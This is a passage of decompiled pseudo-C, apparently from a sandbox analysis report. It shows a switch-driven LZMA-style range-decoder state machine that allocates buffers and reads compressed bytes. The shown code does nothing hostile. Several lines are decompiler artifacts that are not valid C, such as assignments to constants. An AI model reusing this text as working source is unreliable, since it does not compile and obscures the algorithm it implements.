                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                      											_t45 = _t612 - 0x48;
                                                                                      											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                      											__eflags =  *_t45;
                                                                                      											L15:
                                                                                      											if( *(_t612 - 0x48) < 4) {
                                                                                      												goto L13;
                                                                                      											}
                                                                                      											_t546 =  *(_t612 - 0x40);
                                                                                      											if(_t546 ==  *(_t612 - 0x74)) {
                                                                                      												L20:
                                                                                      												 *(_t612 - 0x48) = 5;
                                                                                      												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                                                      												goto L23;
                                                                                      											}
                                                                                      											 *(_t612 - 0x74) = _t546;
                                                                                      											if( *(_t612 - 8) != 0) {
                                                                                      												GlobalFree( *(_t612 - 8));
                                                                                      											}
                                                                                      											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                                                      											 *(_t612 - 8) = _t534;
                                                                                      											if(_t534 == 0) {
                                                                                      												goto L171;
                                                                                      											} else {
                                                                                      												goto L20;
                                                                                      											}
                                                                                      										case 2:
                                                                                      											L24:
                                                                                      											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                                                      											 *(_t612 - 0x84) = 6;
                                                                                      											 *(_t612 - 0x4c) = _t553;
                                                                                      											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                                                      											goto L132;
                                                                                      										case 3:
                                                                                      											L21:
                                                                                      											__eflags =  *(_t612 - 0x6c);
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												 *(_t612 - 0x88) = 3;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											_t67 = _t612 - 0x70;
                                                                                      											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                                                      											__eflags =  *_t67;
                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                      											L23:
                                                                                      											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                                                      											if( *(_t612 - 0x48) != 0) {
                                                                                      												goto L21;
                                                                                      											}
                                                                                      											goto L24;
                                                                                      										case 4:
                                                                                      											L133:
                                                                                      											_t531 =  *_t605;
                                                                                      											_t588 = _t531 & 0x0000ffff;
                                                                                      											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                                                      											if( *(_t612 - 0xc) >= _t564) {
                                                                                      												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                                                      												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                                                      												 *(_t612 - 0x40) = 1;
                                                                                      												_t532 = _t531 - (_t531 >> 5);
                                                                                      												__eflags = _t532;
                                                                                      												 *_t605 = _t532;
                                                                                      											} else {
                                                                                      												 *(_t612 - 0x10) = _t564;
                                                                                      												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                      												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                                                      											}
                                                                                      											if( *(_t612 - 0x10) >= 0x1000000) {
                                                                                      												goto L139;
                                                                                      											} else {
                                                                                      												goto L137;
                                                                                      											}
                                                                                      										case 5:
                                                                                      											L137:
                                                                                      											if( *(_t612 - 0x6c) == 0) {
                                                                                      												 *(_t612 - 0x88) = 5;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                                                      											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                      											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                      											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                                                      											L139:
                                                                                      											_t533 =  *(_t612 - 0x84);
                                                                                      											goto L140;
                                                                                      										case 6:
                                                                                      											__edx = 0;
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x34) = 1;
                                                                                      												 *(__ebp - 0x84) = 7;
                                                                                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      											__esi =  *(__ebp - 0x60);
                                                                                      											__cl = 8;
                                                                                      											__cl = 8 -  *(__ebp - 0x3c);
                                                                                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      											__ecx =  *(__ebp - 0x3c);
                                                                                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      											__eflags =  *(__ebp - 0x38) - 4;
                                                                                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      											if( *(__ebp - 0x38) >= 4) {
                                                                                      												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      												if( *(__ebp - 0x38) >= 0xa) {
                                                                                      													_t98 = __ebp - 0x38;
                                                                                      													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      													__eflags =  *_t98;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      												}
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x38) = 0;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      											if( *(__ebp - 0x34) == __edx) {
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												goto L61;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 8);
                                                                                      												__ebx = 0;
                                                                                      												__ebx = 1;
                                                                                      												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      												goto L41;
                                                                                      											}
                                                                                      										case 7:
                                                                                      											__eflags =  *(__ebp - 0x40) - 1;
                                                                                      											if( *(__ebp - 0x40) != 1) {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      												 *(__ebp - 0x80) = 0x16;
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
                                                                                      												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 4) + 0x664;
                                                                                      												__eflags = __eax;
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												goto L69;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											__ecx =  *(__ebp - 0x38);
                                                                                      											 *(__ebp - 0x84) = 8;
                                                                                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      											goto L132;
                                                                                      										case 8:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xa;
                                                                                      												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x38);
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      												 *(__ebp - 0x84) = 9;
                                                                                      												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      											}
                                                                                      											goto L132;
                                                                                      										case 9:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												goto L90;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x60);
                                                                                      											if( *(__ebp - 0x60) == 0) {
                                                                                      												goto L171;
                                                                                      											}
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      											__eflags = _t259;
                                                                                      											0 | _t259 = _t259 + _t259 + 9;
                                                                                      											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                      											goto L76;
                                                                                      										case 0xa:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 0xb;
                                                                                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      												goto L132;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x28);
                                                                                      											goto L89;
                                                                                      										case 0xb:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__ecx =  *(__ebp - 0x24);
                                                                                      												__eax =  *(__ebp - 0x20);
                                                                                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      											} else {
                                                                                      												__eax =  *(__ebp - 0x24);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x28);
                                                                                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      											L89:
                                                                                      											__ecx =  *(__ebp - 0x2c);
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      											L90:
                                                                                      											__eax =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x80) = 0x15;
                                                                                      											__eax =  *(__ebp - 4) + 0xa68;
                                                                                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      											goto L69;
                                                                                      										case 0xc:
                                                                                      											L100:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xc;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t335 = __ebp - 0x70;
                                                                                      											 *_t335 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t335;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											__eax =  *(__ebp - 0x2c);
                                                                                      											goto L102;
                                                                                      										case 0xd:
                                                                                      											L37:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xd;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t122 = __ebp - 0x70;
                                                                                      											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t122;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L39:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      												goto L48;
                                                                                      											}
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												goto L54;
                                                                                      											}
                                                                                      											L41:
                                                                                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      											 *(__ebp - 0x48) = __eax;
                                                                                      											__eax = __eax + 1;
                                                                                      											__eax = __eax << 8;
                                                                                      											__eax = __eax + __ebx;
                                                                                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edx = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												 *(__ebp - 0x40) = 1;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												__ebx = __ebx + __ebx + 1;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edx;
                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L39;
                                                                                      											} else {
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										case 0xe:
                                                                                      											L46:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t156 = __ebp - 0x70;
                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t156;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											while(1) {
                                                                                      												L48:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													break;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                      													__ebx = _t170;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													goto L46;
                                                                                      												}
                                                                                      											}
                                                                                      											L54:
                                                                                      											_t173 = __ebp - 0x34;
                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      											__eflags =  *_t173;
                                                                                      											goto L55;
                                                                                      										case 0xf:
                                                                                      											L58:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t203 = __ebp - 0x70;
                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t203;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L60:
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												L55:
                                                                                      												__al =  *(__ebp - 0x44);
                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      												goto L56;
                                                                                      											}
                                                                                      											L61:
                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                      											__edx = __ebx + __ebx;
                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                      											__esi = __edx + __eax;
                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                      												__ebx = _t217;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edi;
                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L60;
                                                                                      											} else {
                                                                                      												goto L58;
                                                                                      											}
                                                                                      										case 0x10:
                                                                                      											L110:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t366 = __ebp - 0x70;
                                                                                      											 *_t366 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t366;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											goto L112;
                                                                                      										case 0x11:
                                                                                      											L69:
                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                      											L132:
                                                                                      											 *(_t612 - 0x54) = _t605;
                                                                                      											goto L133;
                                                                                      										case 0x12:
                                                                                      											goto L0;
                                                                                      										case 0x13:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												_t469 = __ebp - 0x58;
                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      												__eflags =  *_t469;
                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                      												goto L144;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      											goto L130;
                                                                                      										case 0x14:
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                      											L140:
                                                                                      											 *(_t612 - 0x88) = _t533;
                                                                                      											goto L1;
                                                                                      										case 0x15:
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      											__al = __al & 0x000000fd;
                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      											goto L121;
                                                                                      										case 0x16:
                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                      											__eflags = __eax - 4;
                                                                                      											if(__eax >= 4) {
                                                                                      												_push(3);
                                                                                      												_pop(__eax);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x40) = 6;
                                                                                      											__eax = __eax << 7;
                                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                      											goto L145;
                                                                                      										case 0x17:
                                                                                      											goto L145;
                                                                                      										case 0x18:
                                                                                      											L146:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t484 = __ebp - 0x70;
                                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t484;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L148:
                                                                                      											_t487 = __ebp - 0x48;
                                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      											__eflags =  *_t487;
                                                                                      											goto L149;
                                                                                      										case 0x19:
                                                                                      											__eflags = __ebx - 4;
                                                                                      											if(__ebx < 4) {
                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                      												L120:
                                                                                      												_t394 = __ebp - 0x2c;
                                                                                      												 *_t394 =  *(__ebp - 0x2c) + 1;
                                                                                      												__eflags =  *_t394;
                                                                                      												L121:
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												_t401 = __ebp - 0x60;
                                                                                      												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      												__eflags =  *_t401;
                                                                                      												goto L124;
                                                                                      											}
                                                                                      											__ecx = __ebx;
                                                                                      											__eax = __ebx;
                                                                                      											__ecx = __ebx >> 1;
                                                                                      											__eax = __ebx & 0x00000001;
                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                      											__al = __al | 0x00000002;
                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                      											__eflags = __ebx - 0xe;
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											if(__ebx >= 0xe) {
                                                                                      												__ebx = 0;
                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                      												L103:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													__eax = __eax + __ebx;
                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 4) + 0x644;
